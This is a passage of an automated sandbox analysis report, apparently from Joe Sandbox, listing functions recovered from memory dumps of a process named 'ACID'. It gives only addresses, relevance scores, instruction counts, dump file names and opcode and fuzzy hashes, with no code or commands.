                                                        • Instruction Fuzzy Hash: 39C1CE70B11606CBCB08BFB9DA9862EBBF5FF88700F504568D445E7395EA349C15CB92
                                                        Function 08368D9C Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 49b07b8a04280d3282ef86ed06fe6834e4f3464ba0d79dcd15a50f5122590989
                                                        • Instruction ID: ba00b86367a36c467339af6deff07beb44c5b007fb39bba4a045a5966be440c7
                                                        • Opcode Fuzzy Hash: 49b07b8a04280d3282ef86ed06fe6834e4f3464ba0d79dcd15a50f5122590989
                                                        • Instruction Fuzzy Hash: 15C1CF70B11606CBC708FFB9D99862EBBF2FB88600F504569D445E7395EA349C15CB92
                                                        Function 0836788A Relevance: .3, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3fdc9550da40715cbf3ea14cf60f1ca99c912133079efe76e3c3c3256f006f12
                                                        • Instruction ID: 09476f2abf46dde2a0b272126f629b925b5a04cf2e94aa7c368f94e5b69ef159
                                                        • Opcode Fuzzy Hash: 3fdc9550da40715cbf3ea14cf60f1ca99c912133079efe76e3c3c3256f006f12
                                                        • Instruction Fuzzy Hash: 5B91AC70B11605CFC708BFB8E99963EBBB6FB88601F844A68E445D7385DE389854CB91
                                                        Function 0836B620 Relevance: .2, Instructions: 227COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b02ea63d45f218f39d964a6d197008d7133498e5642632dbf4706eca5c292c7a
                                                        • Instruction ID: 0131f0331c1934501c56d93b4eef6542da4bcc094e7a4dbd8f7edc58be638314
                                                        • Opcode Fuzzy Hash: b02ea63d45f218f39d964a6d197008d7133498e5642632dbf4706eca5c292c7a
                                                        • Instruction Fuzzy Hash: 25716B70B1160ACFCB04EFBDD994A2EBBE6FBC8621F408529D445D7348EA34D855CBA1
                                                        Function 0836B37D Relevance: .2, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a033532906f61d0acfa6ca494fdc0f11057978ab8cc2c1cc1f68a40863ba41e
                                                        • Instruction ID: 40df6d49843c81d9162aaa089d20a8394948ce3441d3c473c4b0434d1f4730f5
                                                        • Opcode Fuzzy Hash: 5a033532906f61d0acfa6ca494fdc0f11057978ab8cc2c1cc1f68a40863ba41e
                                                        • Instruction Fuzzy Hash: 7C51FCB0B066498BC704FFB9DD9466EBBF6BF88610F458569C448E7384EE349C01CB92
                                                        Function 0836B3A8 Relevance: .2, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ebdc1b13ece461367d5c37e4de719672debb581a8a2847b44759eef5fc5a86ee
                                                        • Instruction ID: 9a2acde6dff63fb9fe8a45c637aff0a0dc7310294f24e002f17223b03710be16
                                                        • Opcode Fuzzy Hash: ebdc1b13ece461367d5c37e4de719672debb581a8a2847b44759eef5fc5a86ee
                                                        • Instruction Fuzzy Hash: BB519C70B116198BC704FFBEDD9566FBBEABBC8610F448529D449E3344EE34A8118B91
                                                        Function 013EC0F8 Relevance: .2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3445487594.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_13e0000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17d731aa7c2449d3f119d7c28c16eada049639a770dea31c34af634bc01e7582
                                                        • Instruction ID: 3bb578f72a2c154a827342a4898453858c0a7ce69b4f3588f799cc635ba34724
                                                        • Opcode Fuzzy Hash: 17d731aa7c2449d3f119d7c28c16eada049639a770dea31c34af634bc01e7582
                                                        • Instruction Fuzzy Hash: A4512D30B1022DDFDB149BADD85CAADBBF6BB88308F105426E50AAB394CB31DC45CB51
                                                        Function 0836AC49 Relevance: .1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46f56f438b4d368605415dcb6703159588a508f9d772c35d3d0053bc62ca0e52
                                                        • Instruction ID: 0d96797c912877e57a848ffc2ccbd20e11db770187df50dd5523b5d65a73d548
                                                        • Opcode Fuzzy Hash: 46f56f438b4d368605415dcb6703159588a508f9d772c35d3d0053bc62ca0e52
                                                        • Instruction Fuzzy Hash: B341E37060D7818FC306AB79D8A452DBFF2EFC2210F45859FD0D9DB292DA389865C792
                                                        Function 0836B24E Relevance: .1, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0149a25c09ae8794905d11b449b3525047bc1c1750802b6acf60a1554bee4d8
                                                        • Instruction ID: 8ec483f70556eadc7495f5677e76801a1f9596e6bddc57de82a18b639fe2553a
                                                        • Opcode Fuzzy Hash: f0149a25c09ae8794905d11b449b3525047bc1c1750802b6acf60a1554bee4d8
                                                        • Instruction Fuzzy Hash: 12311571B092858FC701EFB9DC9466EBFB5FF85610F4485AAD445DB342DA388805CBA1
                                                        Function 013EC0E8 Relevance: .1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3445487594.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_13e0000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a91c1ad102186b750698d428b35fd508db7f293881f9664014bd4a517a1e8307
                                                        • Instruction ID: cd4e617ad6221c3a2dca2fe374a3c893d2f627c262ff889867530824c24fc3f9
                                                        • Opcode Fuzzy Hash: a91c1ad102186b750698d428b35fd508db7f293881f9664014bd4a517a1e8307
                                                        • Instruction Fuzzy Hash: F8416C31A14328DFDF199BACD59DBAD7BF6BB48308F106426E80AAB6D5C731C844CB51
                                                        Function 0836B280 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 402437acc049ae74fba29a33fd1cf7f7eb65374b9b8fa370473ba285473f4ed6
                                                        • Instruction ID: b8be2a42db79801a7b91a92e9c0857ad0f2d3599ad2c249a096e2348453cfe9c
                                                        • Opcode Fuzzy Hash: 402437acc049ae74fba29a33fd1cf7f7eb65374b9b8fa370473ba285473f4ed6
                                                        • Instruction Fuzzy Hash: A021F271B156558BC704BBB9DC9866EBBF5FF88610F40856AD048D7340DE389C11C7A2
                                                        Function 0134D3DC Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a7886712a58ce4a62fa7c5f3bf5c46ad2ef4284a09c1cf4fa28a85f4448169f
                                                        • Instruction ID: b5f9dc2e949be91552366848bf7c40ba92c628c92c25ad81e5f24ae717d61094
                                                        • Opcode Fuzzy Hash: 5a7886712a58ce4a62fa7c5f3bf5c46ad2ef4284a09c1cf4fa28a85f4448169f
                                                        • Instruction Fuzzy Hash: FE213371104204DFDB01EF54D9C0B5ABFA6FBA8328F20C16DE9091B756C73AF446CAA1
                                                        Function 0134D4C8 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 25f2916e67a53d33005f5fbc7dab81e09f519b3a470282c4b966db0c9ab8800a
                                                        • Instruction ID: 32becf3ca7705c8e9c4879a95f0fd1fe135fa2788b42aa5e5da882c5307a94a9
                                                        • Opcode Fuzzy Hash: 25f2916e67a53d33005f5fbc7dab81e09f519b3a470282c4b966db0c9ab8800a
                                                        • Instruction Fuzzy Hash: A0212571500204EFDB15DF58D9C0B2ABFA5FB9831CF2085ADE9094B256C736E456CBE1
                                                        Function 0836B290 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3a1435c0d6efac55aef804826fa25cc10c42ba7d79be4409e49bdcbce128389
                                                        • Instruction ID: d1136f603b3a471315c94043af75336f0d890148a8057ec85347d2f67669cc2d
                                                        • Opcode Fuzzy Hash: f3a1435c0d6efac55aef804826fa25cc10c42ba7d79be4409e49bdcbce128389
                                                        • Instruction Fuzzy Hash: DA11A271B15619CBC704BBBEED9862FF7A9FB88610F508529D449D3340EE38DC1187A1
                                                        Function 0134D3D7 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                        • Instruction ID: 8e916592f89bf307036464594aaab12a83a2b4703f4aee61d0385e8d08d2778f
                                                        • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                        • Instruction Fuzzy Hash: 1111DF76404244CFCB02CF54D5C0B56BFA2FB94328F24C2A9E8090B757C33AE456CBA2
                                                        Function 0134D4C3 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                        • Instruction ID: 6244f44afcd5ab4ac7ac7a0882856bbcfee7bf0b31a1033444b338baf9a4c734
                                                        • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                        • Instruction Fuzzy Hash: DD11B176504244CFDB16CF54D5C4B16BFB2FB94318F24C6A9D8094B257C33AE456CBA1
                                                        Function 0134D7C5 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be970ba661f73a2dee5217847ecd122a3d8c5e8fe16f176b81515eebb6b4f35d
                                                        • Instruction ID: 69eb02ffad9b03c9a2d4e5d7fc82da4e3e53cccf3f362390af6fd05ca7c75cbd
                                                        • Opcode Fuzzy Hash: be970ba661f73a2dee5217847ecd122a3d8c5e8fe16f176b81515eebb6b4f35d
                                                        • Instruction Fuzzy Hash: FC01D4314043449BF7218B99CD84766FFDCEF51228F18C45AEE0C4A282C279A441C6B2
                                                        Function 083672D2 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e93290585a0f46a3fdcfe59b7c5071a7066d1dd88a4a2428d4f9b1c6a4d2b7bb
                                                        • Instruction ID: 3562aac7d60118a2acbb896e78e6e39f49193646a7bd61dbb863d3f7eef45491
                                                        • Opcode Fuzzy Hash: e93290585a0f46a3fdcfe59b7c5071a7066d1dd88a4a2428d4f9b1c6a4d2b7bb
                                                        • Instruction Fuzzy Hash: 64F0E93111D3C1CFEB1A6B74D9690903F70EE4322634985EBF881C72A7CA35C015C721
                                                        Function 0134D7C4 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3444585658.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_134d000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f17d378a91a84712be9065874e78d2e7e5dea8f3a636d7d1a218a47899ef301
                                                        • Instruction ID: b70b0a33e82ce7ea5d5a540d8d4bec636dd2d5ea0aa9477b3f9717ba67b04e02
                                                        • Opcode Fuzzy Hash: 8f17d378a91a84712be9065874e78d2e7e5dea8f3a636d7d1a218a47899ef301
                                                        • Instruction Fuzzy Hash: E7F06271405344AFF7118F59DDC4B62FFD8EB51629F18C45AED0C5A286C379A844CAB1
                                                        Function 0836F2B1 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a5a2bdd8a2ed9a2ef870c8439633032ecac985ffc958d8f0993d5c39c58a4a62
                                                        • Instruction ID: c221b71e11093a5cd09e41f5d4cd960ba73508022a9c22aa98340c5da3b657ca
                                                        • Opcode Fuzzy Hash: a5a2bdd8a2ed9a2ef870c8439633032ecac985ffc958d8f0993d5c39c58a4a62
                                                        • Instruction Fuzzy Hash: 25F037B0D0424AEFEB04CFB9D406AAEBFF0AF4A210F1185AAD900EB201D7708541CB91
                                                        Function 0836F2C0 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b3db17b05cc972a714f0122e7715fd7c7b0a1d17887bfde3ecfb4901ad2a225
                                                        • Instruction ID: 1fd13af98eae13491eec6285d128527959ff8e7b63ac47c19b56be7e7886a65d
                                                        • Opcode Fuzzy Hash: 8b3db17b05cc972a714f0122e7715fd7c7b0a1d17887bfde3ecfb4901ad2a225
                                                        • Instruction Fuzzy Hash: D1F0DAB0D0420ADFDB54DFADD841AAEBFF4FB48210F5085AAD918E7204DB74D6118B91
                                                        Function 0836F25A Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 27a463a9526114a04ba55cf5eeb52c456b0144826fa8a05ccecf05e54c925d18
                                                        • Instruction ID: 40e530d1162fe3102fda0a56e904ddbbb674736089b6cd2c43f839fd39d77373
                                                        • Opcode Fuzzy Hash: 27a463a9526114a04ba55cf5eeb52c456b0144826fa8a05ccecf05e54c925d18
                                                        • Instruction Fuzzy Hash: 6DF039B8C40206DFDB40DFB9D40665EBFF0BF09211F1184AAD005EB222D7704540CF81
                                                        Function 083672F2 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5988715afc6849c3255f2d3826236c7d982b034f11e711d7ee20a28c05b7e6ec
                                                        • Instruction ID: cfe73fa9f2fe361e1e08fa9bfe322c49ea157ea64700434dbffbdd412c3f3d06
                                                        • Opcode Fuzzy Hash: 5988715afc6849c3255f2d3826236c7d982b034f11e711d7ee20a28c05b7e6ec
                                                        • Instruction Fuzzy Hash: FDF06531119381CFFB1A2B74D4190513F70EE5621630948D9E886C6252CB328000CB11
                                                        Function 013EC0B9 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3445487594.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_13e0000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c610fa1a49ee5fd06a15cdde024757284acd8c23f38d304eb8c818a30079def
                                                        • Instruction ID: f922d05e0d6984d499d5f8bbf713141be1d2b8dc6e1d350bfe862eb6086e5ff6
                                                        • Opcode Fuzzy Hash: 2c610fa1a49ee5fd06a15cdde024757284acd8c23f38d304eb8c818a30079def
                                                        • Instruction Fuzzy Hash: FED0A7B26041586BCB1897FC99553DF6F99DF84660F0844AEE04DF3241C931A5404755
                                                        Function 0836F268 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c9aa6e470d50df8de93b6dcfcd818e96c6089ae80b27142453f1c6171c6564b
                                                        • Instruction ID: 24647cfbf235119f82bd7b4947ba37763e8a1d52fe0195f5839584371e420812
                                                        • Opcode Fuzzy Hash: 9c9aa6e470d50df8de93b6dcfcd818e96c6089ae80b27142453f1c6171c6564b
                                                        • Instruction Fuzzy Hash: F3E046B8D0020ADFC740EFBED904A5EBBF0BF08200F10C5AAD018E7215EBB086008F80
                                                        Function 08367300 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b88d90c4895ca87f1a15a9a2556e6ba7a5bbb1cd201a3fe3eae7f21a9df0ccb
                                                        • Instruction ID: 43e2ed52ad59af433dc0065f04e4a8ec232e425321e2cdf961be750f0a499ebf
                                                        • Opcode Fuzzy Hash: 6b88d90c4895ca87f1a15a9a2556e6ba7a5bbb1cd201a3fe3eae7f21a9df0ccb
                                                        • Instruction Fuzzy Hash: CDE0B630225305CBEB1C7FB5E4195653B69FB846167958168F80681284CF329401CF50
                                                        Function 0836F360 Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08435d9a15a1796cc4ff229f9044c3ef7a38acf27498314f13d41e72ab3fe831
                                                        • Instruction ID: ddaf0f6192ecf40ffd3100ed34f3853aaf837cf381a74334021fe69cff2c97ed
                                                        • Opcode Fuzzy Hash: 08435d9a15a1796cc4ff229f9044c3ef7a38acf27498314f13d41e72ab3fe831
                                                        • Instruction Fuzzy Hash: AFD0123615410D9F8B41EF98F840D527BECAB54651740C062F508C6120EA21F574EB52
                                                        Function 08369A4A Relevance: .0, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.3478781390.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_8360000_ACID.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 846f771f603d2af9ac115ad3027576e2e661b02a1d3e57c7d8f50dad7a7bb22c
                                                        • Instruction ID: d1b23a6e2e6e2f6bfb444137cfd4f2ac349bd91a7d730cf3ff0d877e07250dc1
                                                        • Opcode Fuzzy Hash: 846f771f603d2af9ac115ad3027576e2e661b02a1d3e57c7d8f50dad7a7bb22c
                                                        • Instruction Fuzzy Hash: 25B01237B04408D80900008D78410D8F35CE1C41376008163D71E41405123122344151